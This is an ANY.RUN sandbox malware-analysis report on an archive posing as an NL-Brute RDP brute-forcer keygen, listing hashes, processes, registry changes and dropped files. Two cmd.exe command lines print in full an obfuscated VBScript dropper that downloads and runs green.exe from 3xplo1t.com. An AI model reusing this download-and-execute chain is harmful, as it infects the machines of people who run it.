File name:

NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z

Full analysis: https://app.any.run/tasks/87da4e6e-8ebf-4e25-a2ce-5367add31653
Verdict: Malicious activity
Analysis date: November 20, 2018, 17:34:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

37398F3A62624CC800F8BD0FBDE14864

SHA1:

53FE5275EB42ED0D13E32ACEE6FC4411335984EE

SHA256:

08443ACA2D1C220360CA6409D7062995DD4C9034A90D26A19A73F670D2224E6D

SSDEEP:

196608:1+nirUSrXcsLhUP+tNLg9VR8hrPg/wnOPeZxNXYdsaysWfLBrcLvHfnrhm9:qirNXcsLtN09VRo6wnGUXYdsay/DBYvE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3360)
      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)

    • Executes scripts

      • cmd.exe (PID: 2764)
      • NLBrute 1.2 x64 & VPN.exe (PID: 3492)
      • NLBrute 1.2 x64.exe (PID: 3344)
      • cmd.exe (PID: 2836)

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3308)
      • WScript.exe (PID: 3456)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
11
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe nlbrute 1.2 x64 & vpn.exe wscript.exe no specs cmd.exe no specs wscript.exe no specs timeout.exe no specs nlbrute 1.2 x64.exe wscript.exe no specs cmd.exe no specs wscript.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1272"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1464timeout 12 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2152"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\X6j.vBe" C:\Windows\System32\WScript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2552timeout 12 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2764"C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXEC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2836"C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO B3c = "http://3xplo1t.com/green.exe">>X6j.vBe &@EChO V9e = Z5d("pt`Mdwd")>>X6j.vBe &@EChO Set U8s = CreateObject(Z5d("lrwlkQMwlkgsso"))>>X6j.vBe &@EChO U8s.Open Z5d("fds"), B3c, False>>X6j.vBe &@EChO U8s.send ("")>>X6j.vBe &@EChO Set S1f = CreateObject(Z5d("`cncaMrsqd`l"))>>X6j.vBe &@EChO S1f.Open>>X6j.vBe &@EChO S1f.Type = 1 >>X6j.vBe &@EChO S1f.Write U8s.ResponseBody>>X6j.vBe & @EChO S1f.Position = 0 >>X6j.vBe &@EChO S1f.SaveToFile V9e, 2 >>X6j.vBe &@EChO S1f.Close>>X6j.vBe &@EChO function Z5d(O3z) >> X6j.vBe &@EChO For J8x = 1 To Len(O3z) >>X6j.vBe &@EChO A7l = Mid(O3z, J8x, 1) >>X6j.vBe &@EChO A7l = Chr(Asc(A7l)- 31) >>X6j.vBe &@EChO V7b = V7b + A7l >> X6j.vBe &@EChO Next >>X6j.vBe &@EChO Z5d = V7b >>X6j.vBe &@EChO End Function >>X6j.vBe& X6j.vBe &DEL X6j.vBe & timeout 12 & QUA.EXEC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3308"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js" C:\Windows\System32\WScript.exeNLBrute 1.2 x64.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3344"C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe" C:\Users\admin\Desktop\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\nl-brute 1.2 x64 & 1.2 x64 vpn edition - keygen\nlbrute 1.2 x64.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
3360"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3456"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\FA.js" C:\Windows\System32\WScript.exeNLBrute 1.2 x64 & VPN.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 133
Read events
2 076
Write events
57
Delete events
0

Modification events

(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3360) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3360) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(3492) NLBrute 1.2 x64 & VPN.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
5
Suspicious files
1
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
3492NLBrute 1.2 x64 & VPN.exeC:\Users\admin\AppData\Local\Temp\autCF85.tmp
MD5:
SHA256:
3492NLBrute 1.2 x64 & VPN.exeC:\Users\admin\AppData\Local\Temp\autDD42.tmp
MD5:
SHA256:
3344NLBrute 1.2 x64.exeC:\Users\admin\AppData\Local\Temp\autABA.tmp
MD5:
SHA256:
3344NLBrute 1.2 x64.exeC:\Users\admin\AppData\Local\Temp\aut1847.tmp
MD5:
SHA256:
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN - KeyGen\key.txttext
MD5:E1496DB70F136597884F6D1DE550EE1B
SHA256:36307D6A90BB74275AEBAABB0DF7E30478C685D5E40A6772D7892004A72C22DE
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64 & VPN - KeyGen\Thumbs.dbbinary
MD5:632F21B2FF993B86727539641895F39F
SHA256:CA2EDDBC5869056B3BF122B60DA12F2ADBBDCB31EBE8E9B6C3A99E2A311E968A
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\a3e0dfcaa65540c2b2295df658e1294e.pngimage
MD5:D2C7DF27E3508AC727337D45CF64D105
SHA256:36C7B94542AE79E27F02324519467BD2850FE45B86675EBE6748D6B0D901B3CF
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\settings.initext
MD5:BD030391DAC046B0E05A5BAB3C738EE7
SHA256:774CFE32DCEF45CD131EC4BE8B35AB33BC0886DA95A6E3522437ADDF72E32BCE
2836cmd.exeC:\Users\admin\AppData\Local\Temp\X6j.vBetext
MD5:2CD07081F292637FAD320E66DA1D465C
SHA256:954391EEA5DE4C62B9E40B189FF61A12F60489DBA92F284F75B1107FC5A197DF
3360WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb3360.27643\NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN\NLBrute 1.2 x64.exeexecutable
MD5:EF5AF094147A15CB93E0133EF08AFB94
SHA256:20A1B69ABA93767FCAC326842B8A532B4A83A08FCCFE320387584A778A6CB574
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
3xplo1t.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
NL-Brute 1.2 x64 & 1.2 x64 VPN Edition - KEYGEN.7z